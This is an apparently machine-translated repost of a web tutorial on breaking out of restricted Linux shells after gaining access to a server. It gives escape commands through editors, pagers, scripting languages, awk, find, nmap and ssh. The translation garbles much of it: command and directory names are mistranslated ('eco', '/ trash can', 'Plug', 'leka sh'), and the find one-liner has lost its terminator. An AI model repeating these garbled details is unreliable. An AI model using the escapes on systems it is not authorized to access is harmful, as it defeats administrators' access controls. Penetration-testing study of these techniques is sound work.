قالب وردپرس درنا توس
Home / Tips and Tricks / How to Avoid Limited Scale Environments on Linux «Zero Byte :: WonderHowTo

How to Avoid Limited Scale Environments on Linux «Zero Byte :: WonderHowTo



Right now, when you’ll finally get a shell on the web server you’ve been working with, you’ll be in a strange environment with limited functionality. Limited shells are often used as an extra line of defense and can be frustrating for an attacker to trip over. But with enough patience and perseverance, it is possible to escape these limited environments.

What are limited shells?

Restricted shells are simply shells with limited permissions, functions or commands. They are primarily used to ensure that users can perform the minimum steps required for daily operation in a safe, enclosed environment. Administrators can also use them to ensure that they do not enter dangerous commands by mistake. Sometimes these limited shells can even be put in place to deter hackers.

The most common types of restricted shells are just normal shells with certain restrictions in place, such as rbash, rksh and rzsh. Other types can be configured more to suit certain needs and sharpen constraints, such as lshell and rssh.

Environmental account

The first step in escaping from confined shells is to gather information about the environment. Some of the most basic commands to start trying are ls, CD, pwdand eco. For the most part, if these commands are restricted, an error will appear with the type of restricted shell we are in (mostly, this is rbash).

Then try to get a list of available commands by pressingTab key twice. We can also try to list binary files in / trash can, / usr / binand / usr / local / bin if ls is available. Alternatively, we can use globbing to re-list directory content eco is available, as:

echo /usr/bin/*

It is also important to look for operators and avoid signs such as the following:

> >> < | & ; : ' " `

Also shell driving:

$(whoami)
${whoami}

We can search for files with SUID privileges and all commands we can run with sudo which allows us to escalate privileges. All programming languages ​​in the system also have a good chance of letting us break boundaries.

If we can copy files to our path, we can circumvent restrictions by using known escape binaries or by writing our own script. To get other information about the environment we are in, try commands like a V or printenv.

Method 1
: Text editor

The first technique we should look at to avoid limited shells is through text editors. Most text editors, such as vim, vi, nano, pico, ed, etc., can run commands and scripts inside them. The following commands can be used to potentially create a shell:

:!/bin/sh
:shell
:set shell=/bin/sh

Be sure to also try different shells - sh or bash can be blocked, but zsh may not. Many times this is defended, but it is worth a try because it is such a simple method of exploitation.

Method 2: Pager

In the same way as text editors, pagers can also be used to run commands. Pagers are simply tools that control output that is too long to fit on the screen. The most popular of these are less and More. Only open a file that is too long to be displayed on a page and try the following commands in the tool:

!/bin/sh
!/bin/bash
!bash

Linux MAN the command is also prone to this type of escape because it uses less or More by default pager.

Method 3: Programming language

The next method we can use to break out of limited shells is to misuse all programming languages ​​in the system. Sometimes, if some operators are blocked, this technology does not work well, but usually it can be very effective for escape. Here are some common ways to play a shell.

Python:

import os; os.system("/bin/sh")

PHP:

exec("sh -i");

Perl:

exec "/bin/sh";

Ruby:

exec "/bin/sh"

Plug:

os.execute("/bin/sh")

Of course, other programming languages ​​may have their own ways of executing local commands and playing shells.

Method 4: Miscellaneous

There are a variety of other methods to escape from confined shells, but we will explore some of the more popular ones here.

If awk command can be run, a shell can be created with the following:

awk 'BEGIN {system("/bin/sh")}'

The find the command can try to create a shell with the following command:

find / -name foobar -exec /bin/sh ;

The expect the command can play a shell with its own spawn function. First, let go of the anticipation by writing expect in the terminal. Then write leka sh, and finally sh. If it succeeds, we are now in an interactive shell.

By using teewe can create a script in scenarios where text editors are not available and redirect characters are blocked:

echo "bash -i" | tee script.sh

Older versions of nmap have an interesting feature called interactive mode. It's rare to find it nowadays, but if you come across it, it's easy to open an interactive shell with the following:

nmap --interactive
nmap> !sh

Finally, if SSH access is available but lets you in a restricted shell, connection with the following options can be used to escape:

ssh user@IP -t "bash --noprofile"
ssh user@IP -t "/bin/sh"

Ends

In this tutorial, we learned about limited shells and why they are used to secure environments. We then learned how to enumerate the environment to determine what we do and do not have access to. Then we covered different techniques to break out of these limited environments with the help of text editors, pagers, programming languages ​​and more. Overall pretty simple, right?

Do you want to start making money as a white hat hacker? Start your career with white-hat hacking with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get more than 60 hours of training from ethical hacking professionals.

Buy now (90% off)>

Cover image by Jimmy Chan / Pexels; Screenshots of drd_ / Zero Byte

Source link